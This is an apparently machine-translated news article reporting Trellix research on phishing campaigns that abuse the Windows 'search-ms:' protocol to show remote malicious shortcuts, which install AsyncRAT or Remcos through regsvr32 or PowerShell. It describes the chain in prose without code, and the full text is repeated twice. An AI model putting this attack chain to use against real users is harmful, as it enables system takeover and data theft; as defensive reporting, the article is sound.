A JavaScript script from the browser lures users into a clever trap.
Cybersecurity experts have discovered that attackers use a legitimate search function in Windows to secretly download malware to their victims ' computers. In this way, hackers can gain full access to the system and steal confidential data.
According to Trellix experts, criminals maliciously use the "search-ms:" protocol, which allows applications and links to run a local search on the user's device.
In their attacks, attackers create phishing emails with malicious links or HTML attachments that redirect the victim to infected sites. It activates JavaScript code that uses the "search-ms:" protocol to search for hackers on a remote server.
When you click on the link, you are prompted for permission to open Windows Explorer. If the user confirms it, they will be shown supposedly local search results — shortcuts to PDF files and other familiar icons.
JavaScript request to launch Explorer
However, these are actually deleted malicious files disguised as safe ones. They are displayed directly in Windows Explorer, so the user does not see the trick and runs the file, thinking that it is in his system. This is how malware execution starts unnoticed.
Malicious shortcut that starts a network library
When you click on the shortcut, a malicious DLL is executed through the utility regsvr32.exe. And in an alternative version of the attack, also identified by the researchers, shortcuts launch PowerShell scripts that secretly download additional payloads.
As a result, remote management software AsyncRAT or Remcos RAT is installed on the victim's computer, and hackers gain full control over the system, can steal data and sell the access to other attackers.
With Microsoft constantly blocking known attack methods, hackers are desperately looking for workarounds. And the use of search protocols is just one of these ways to circumvent system restrictions.
Experts recommend avoiding clicks on suspicious links and downloading files from unknown sources, so as not to add to the list of victims of inventive cybercriminals.
Cybersecurity experts have discovered that attackers use a legitimate search function in Windows to secretly download malware to their victims ' computers. In this way, hackers can gain full access to the system and steal confidential data.
According to Trellix experts, criminals maliciously use the "search-ms:" protocol, which allows applications and links to run a local search on the user's device.
In their attacks, attackers create phishing emails with malicious links or HTML attachments that redirect the victim to infected sites. It activates JavaScript code that uses the "search-ms:" protocol to search for hackers on a remote server.
When you click on the link, you are prompted for permission to open Windows Explorer. If the user confirms it, they will be shown supposedly local search results — shortcuts to PDF files and other familiar icons.
JavaScript request to launch Explorer
However, these are actually deleted malicious files disguised as safe ones. They are displayed directly in Windows Explorer, so the user does not see the trick and runs the file, thinking that it is in his system. This is how malware execution starts unnoticed.
Malicious shortcut that starts a network library
When you click on the shortcut, a malicious DLL is executed through the utility regsvr32.exe. And in an alternative version of the attack, also identified by the researchers, shortcuts launch PowerShell scripts that secretly download additional payloads.
As a result, remote management software AsyncRAT or Remcos RAT is installed on the victim's computer, and hackers gain full control over the system, can steal data and sell the access to other attackers.
With Microsoft constantly blocking known attack methods, hackers are desperately looking for workarounds. And the use of search protocols is just one of these ways to circumvent system restrictions.
Experts recommend avoiding clicks on suspicious links and downloading files from unknown sources, so as not to add to the list of victims of inventive cybercriminals.
